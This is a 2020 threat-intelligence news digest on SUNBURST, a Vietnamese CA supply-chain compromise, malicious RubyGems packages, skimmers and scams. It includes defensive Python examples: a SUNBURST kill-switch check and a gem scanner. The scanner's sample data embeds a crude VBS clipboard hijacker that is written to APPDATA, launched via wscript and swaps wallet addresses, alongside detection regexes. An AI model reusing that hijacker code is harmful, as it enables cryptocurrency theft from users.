Cyware Daily Threat Intelligence, December 17, 2020


Supply chain attacks are getting uglier as threat actors refine their techniques. On the heels of the SolarWinds compromise, researchers have found a new supply chain attack targeting the Vietnam Government Certification Authority (VGCA). The attackers compromised the agency's digital signature toolkit so that it installed spyware, tracked as PhantomNet or Smanager, on victims' systems.

Meanwhile, answering the attackers behind the SolarWinds compromise, Microsoft, FireEye, and GoDaddy have jointly created a kill switch for the SUNBURST backdoor that disrupts the malware's operation.

In other news, two malicious RubyGems packages and 28 malicious Chrome and Edge extensions were found stealing cryptocurrency and users' data, respectively.

Top Breaches Reported in the Last 24 Hours

Widespread banking fraud campaign
Threat actors have stolen millions of dollars from US and EU banks in an ongoing worldwide mobile banking fraud campaign. The attackers used large emulator farms to log in to thousands of compromised accounts while posing as the victims' own mobile devices. According to reports, roughly 20 emulators were used to spoof more than 16,000 compromised devices.

Supply chain attack
Researchers have uncovered a new supply chain attack targeting the Vietnam Government Certification Authority (VGCA). The attackers compromised the agency's digital signature toolkit so that it installed spyware, tracked as PhantomNet or Smanager, on victims' systems. The compromise occurred between July 23 and August 16, 2020.

Top Malware Reported in the Last 24 Hours

Kill Switch for SUNBURST
FireEye, working with Microsoft and GoDaddy, has created a kill switch for SUNBURST, the backdoor delivered through trojanized updates of SolarWinds' Orion platform. The backdoor has reportedly impacted several U.S. government agencies and many private firms, including Boeing, AT&T, and Ford.
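The kill switch works because SUNBURST checks the address that its command-and-control domain resolves to and shuts itself down when that address falls inside a set of hard-coded ranges (private and reserved space plus a few public blocks); pointing the domain at an address inside one of those blocks therefore stops the backdoor on every infected host that still calls home. The following is an added example, not code from FireEye, Microsoft, GoDaddy, or the backdoor itself, that reproduces that decision logic in Python; the range list is taken from public analyses of the backdoor and the host-to-address table is constructed for the demonstration, so treat both as assumptions rather than an exact copy of the malware's behaviour.

```python
import ipaddress
from typing import Dict

# Resolved-address ranges that cause SUNBURST to stop. Reproduced from public
# analyses of the backdoor; ASSUMPTION: the list is illustrative, not authoritative.
KILL_RANGES = [ipaddress.ip_network(n) for n in (
    # private / reserved space
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3",
    "fc00::/7", "fec0::/10", "ff00::/8",
    # public blocks that also trigger the shutdown path
    "20.140.0.0/15", "96.31.172.0/24", "131.228.12.0/22", "144.86.226.0/24",
)]


def sunburst_would_stop(resolved_ip: str) -> bool:
    """Return True if a C2 domain resolving to this address would make the backdoor exit."""
    addr = ipaddress.ip_address(resolved_ip)
    # An IPv4 address is never "in" an IPv6 network (and vice versa), so mixing is safe.
    return any(addr in net for net in KILL_RANGES)


def evaluate(resolutions: Dict[str, str]) -> Dict[str, str]:
    """Map each hostname to 'stop' or 'continue' based on what it resolves to."""
    return {
        host: ("stop" if sunburst_would_stop(ip) else "continue")
        for host, ip in resolutions.items()
    }


# CONSTRUCTED sample: hostnames and addresses invented for this example.
# 20.140.0.1 sits in 20.140.0.0/15, the kind of address a sinkhole can hand back;
# 203.0.113.10 is documentation space standing in for an attacker-controlled host.
CONSTRUCTED_RESOLUTIONS = {
    "sinkholed-c2.example": "20.140.0.1",
    "attacker-c2.example": "203.0.113.10",
    "lab-resolver.example": "10.1.2.3",
}

if __name__ == "__main__":
    for host, verdict in evaluate(CONSTRUCTED_RESOLUTIONS).items():
        print(f"{host:28} -> {verdict}")
```

The practical point for defenders is that the kill switch only reaches hosts whose DNS resolution still goes through the seized domain; an implant that has already been handed off to second-stage tooling is not affected, so the sinkhole is a containment aid, not a clean-up.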

Malicious RubyGems packages
Two malicious packages were removed from the RubyGems repository for their role in a supply chain attack designed to steal cryptocurrency from unsuspecting users. The packages, 'pretty_color-0.8.1.gem' and 'ruby-bitcoin-0.0.20.gem', masqueraded as a bitcoin library and a library for printing strings with color effects. Each contained a malicious Ruby script that drops a VBS script acting as a clipboard hijacker, which swaps any cryptocurrency wallet address the victim copies for one controlled by the attacker.
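A quick way to triage a gem for this pattern is to scan its unpacked files for the combination the item describes: a script file being written to disk, Windows Script Host usage, clipboard access, and a hard-coded wallet address. The following is an added example, not code from the researchers who reported the packages or from RubyGems, written in Python; the gem paths, file contents, and indicator patterns are all constructed for the demonstration (the "malicious" sample is a deliberately crude stand-in, not the real payload), so treat them as assumptions.

```python
import re
from typing import Dict, List

# Indicator patterns. CONSTRUCTED for this example; a real rule set would be broader.
INDICATORS = {
    "drops_vbs": re.compile(r"\.vbs\b", re.IGNORECASE),
    "writes_file": re.compile(r"File\.(?:write|open)\s*\("),
    "windows_script_host": re.compile(r"\b(?:WScript|CreateObject)\b"),
    "clipboard_access": re.compile(r"Clipboard|GetData|SetData", re.IGNORECASE),
    # Legacy (1/3-prefixed) and bech32 bitcoin address shapes.
    "btc_address_literal": re.compile(
        r"\b(?:bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b"),
    "system_exec": re.compile(r"\b(?:system|exec|spawn)\s*\(|`[^`]*`"),
}


def scan_gem_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Return, per file path, the names of every indicator that matched."""
    hits: Dict[str, List[str]] = {}
    for path, content in files.items():
        matched = [name for name, pat in INDICATORS.items() if pat.search(content)]
        if matched:
            hits[path] = matched
    return hits


def flag_clipboard_hijackers(files: Dict[str, str]) -> List[str]:
    """Flag files that drop a script AND touch the clipboard or embed a wallet address."""
    flagged = []
    for path, matched in scan_gem_files(files).items():
        drops = "drops_vbs" in matched
        hijack = "clipboard_access" in matched or "btc_address_literal" in matched
        if drops and hijack:
            flagged.append(path)
    return flagged


# CONSTRUCTED sample gem contents. Paths and code are invented for the example;
# the wallet address is a made-up string that only has the right shape.
CONSTRUCTED_GEM_FILES = {
    "pretty_color-0.8.1/lib/pretty_color.rb": r'''
module PrettyColor
  def self.paint(text, code)
    "\e[#{code}m#{text}\e[0m"
  end
end
''',
    "ruby-bitcoin-0.0.20/lib/ruby-bitcoin.rb": r'''
module RubyBitcoin
  PAYLOAD = <<~VBS
    Set html = CreateObject("htmlfile")
    Do
      clip = html.ParentWindow.ClipboardData.GetData("text")
      If clip <> "" Then html.ParentWindow.ClipboardData.SetData "text", "1AbCdEfGhJkMnPqRsTuVwXyZ23456789ab"
      WScript.Sleep 500
    Loop
  VBS

  def self.install
    path = File.join(ENV["APPDATA"].to_s, "helper.vbs")
    File.write(path, PAYLOAD)
    system("wscript.exe \"#{path}\"")
  end
end
''',
}

if __name__ == "__main__":
    for path, matched in scan_gem_files(CONSTRUCTED_GEM_FILES).items():
        print(f"{path}: {', '.join(matched)}")
    print("flagged:", flag_clipboard_hijackers(CONSTRUCTED_GEM_FILES))
```

Pattern matching like this is a triage aid, not proof: real payloads are usually obfuscated or base64-encoded before being written to disk, so the strings above would not appear in plain text and the scan would have to be run against the decoded content or complemented by behavioural checks (files created, processes spawned) in a sandbox.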

Meyhod skimmer discovered
Researchers have discovered a new skimmer called Meyhod on several e-commerce sites, including those of hair treatment company Bosley and the Chicago Architecture Center (CAC). Elements of the skimmer code vary from site to site, with the operators apparently tailoring it to blend in with each victim site's existing code.

Malicious extensions
Researchers have found 28 malicious Chrome and Edge extensions that allow attackers to steal users' data and redirect victims to ads and phishing sites. The tainted extensions pose as helper add-ons for Vimeo, Instagram, Facebook, and other popular online services.

Top Vulnerabilities Reported in the Last 24 Hours

Trend Micro patches serious flaws
Trend Micro has issued updates for serious vulnerabilities affecting its InterScan Web Security Virtual Appliance (IWSVA). The flaws include CSRF protection bypass, XSS, authorization and authentication bypass, command execution, and command injection issues.

Faulty P2P file sharing feature
Design flaws in the P2P file-sharing features of Huawei, LG, and Xiaomi smartphones can allow nearby attackers to hijack file transfer sessions.

HPE discloses a zero-day bug
HPE has shared mitigations for a zero-day vulnerability affecting the latest versions of its HPE Systems Insight Manager (SIM) software for Windows and Linux. The flaw, a remote code execution bug tracked as CVE-2020-7200, carries a CVSS score of 9.8.

Top Scams Reported in the Last 24 Hours

Christmas bonus scam
Experts are warning Facebook users to watch for a Christmas bonus scam that appears to come from people in their contact lists. The message claims to offer a Christmas bonus or Christmas benefit, for which the target is asked to contact a "Facebook agent" who then sends a follow-up message about a contest supposedly sponsored by Powerball. The ultimate purpose of the scam is to steal victims' personal information and money.


sunburst backdoor
malicious extensions
rubygems packages
meyhod skimmer
christmas bonus scam

Posted on: December 17, 2020
